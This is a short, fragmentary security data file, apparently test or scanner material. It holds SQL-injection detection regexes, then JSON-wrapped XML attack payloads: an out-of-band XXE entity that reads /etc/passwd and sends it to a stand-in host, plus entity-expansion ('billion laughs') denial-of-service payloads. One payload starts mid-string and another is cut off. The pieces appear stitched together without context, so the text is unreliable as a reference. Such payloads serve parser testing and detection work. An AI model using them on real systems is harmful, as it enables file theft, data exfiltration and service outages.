\b(?:SELECT|INSERT|UPDATE|DELETE|DROP|UNION|ALTER|EXEC(?:UTE)?|sp_executesql)\b
\b(?:EXEC(?:UTE)?|sp_executesql)\s*\([^)]*\+\s*[^)]*\)
\b(?:SELECT|INSERT|UPDATE|DELETE|DROP|UNION|ALTER|EXEC(?:UTE)?|sp_executesql)\b|\b(?:EXEC(?:UTE)?|sp_executesql)\s*\([^)]*\+\s*[^)]*\)




{
  "xml": "<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n<!ELEMENT foo (#ANY)>\n<!ENTITY % xxe SYSTEM \"file:///etc/passwd\">\n<!ENTITY blind SYSTEM \"https://www.example.com/?%xxe;\">]><foo>&blind;</foo>"
}

"scaer"><!ENTITY xeecodoi1 "&xeecodoi0;&xeecodoi0;"><!ENTITY xeecodoi2 "&xeecodoi1;&xeecodoi1;"><!ENTITY xeecodoi3 "&xeecodoi2;&xeecodoi2;">]>
{
  "xml": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<!DOCTYPE root [\n  <!ENTITY lol \"lol\">\n  <!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n  <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol
